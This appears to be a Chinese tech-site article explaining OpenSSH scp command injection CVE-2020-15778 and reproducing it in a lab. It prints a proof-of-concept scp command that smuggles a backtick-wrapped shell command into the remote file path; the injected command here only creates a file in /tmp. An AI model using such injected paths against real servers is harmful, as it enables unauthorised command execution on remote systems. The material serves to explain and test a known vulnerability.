OpenSSH命令注入漏洞CVE-2020-15778该如何分析
发表于:2025-12-01 作者:千家信息网编辑
千家信息网最后更新 2025年12月01日,OpenSSH命令注入漏洞CVE-2020-15778该如何分析,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。漏洞介绍SCP(sec
千家信息网最后更新 2025年12月01日OpenSSH命令注入漏洞CVE-2020-15778该如何分析影响版本
OpenSSH命令注入漏洞CVE-2020-15778该如何分析,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。
漏洞介绍
SCP(secure copy)是linux系统下基于ssh登录进行安全远程文件拷贝的命令,可以在linux之间复制文件和目录。
OpenSSH中小于 8.3p1版本 SCP命令里存在命令注入漏洞。当将文件复制到远程服务器时,文件路径附加在本地scp命令的末尾,可以触发命令注入漏洞。
攻击者可以采用反引号(`)文件作为命令注入执行scp命令,命令将会发送到远程服务器并执行。
影响版本
version: <=openssh-8.3p1
复现环境
攻击机:192.168.20.101
靶机:192.168.20.102
利用场景:已知 ssh 密码为 docker
漏洞复现:
scp cve202015778.txt docker@192.168.20.102:'`touch /tmp/cve202015778.sh`tmp'#touch /tmp/cve202015778.sh`tmp' 单引号包裹全路径信息#touch /tmp/cve202015778.sh` 反引号包裹要执行的命令#中途需要身份验证,需要输入对应用户的密码
靶机查看信息
关于 OpenSSH命令注入漏洞CVE-2020-15778该如何分析问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注行业资讯频道了解更多相关知识。
命令
漏洞
文件
分析
引号
问题
信息
包裹
密码
更多
服务器
版本
路径
靶机
帮助
攻击
服务
解答
易行
安全
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
网络安全法和刑法的关系
平安证券服务器连接不上
离线考试软件开发
职工网络安全知识竞赛试题
网络安全教育教案反思
网上云旅游软件开发建议
电视显示互联网连接不上服务器
科技互联网定义
网络安全宣传小视频怎么做
服务器网络电压低
软件开发需要几级英语
我国的网络安全历史
服务器不安全怎么办
sql数据库表字段导入
数据库排他锁共享锁
电脑服务器一直没响应怎么回事
vb获取网页表格数据库
深度学习服务器是什么
厦门畅通行网络技术有限公司
汕头汽车软件开发公司
互联网科技小额
web服务器 进程
上海互联网养老软件开发公司
按照网络安全等级
应届生去银行软件开发
数据库关闭查询的宏
删除数据库记录
美国邮箱数据库
深圳神州物联网络技术有限公司
高考网络技术应用
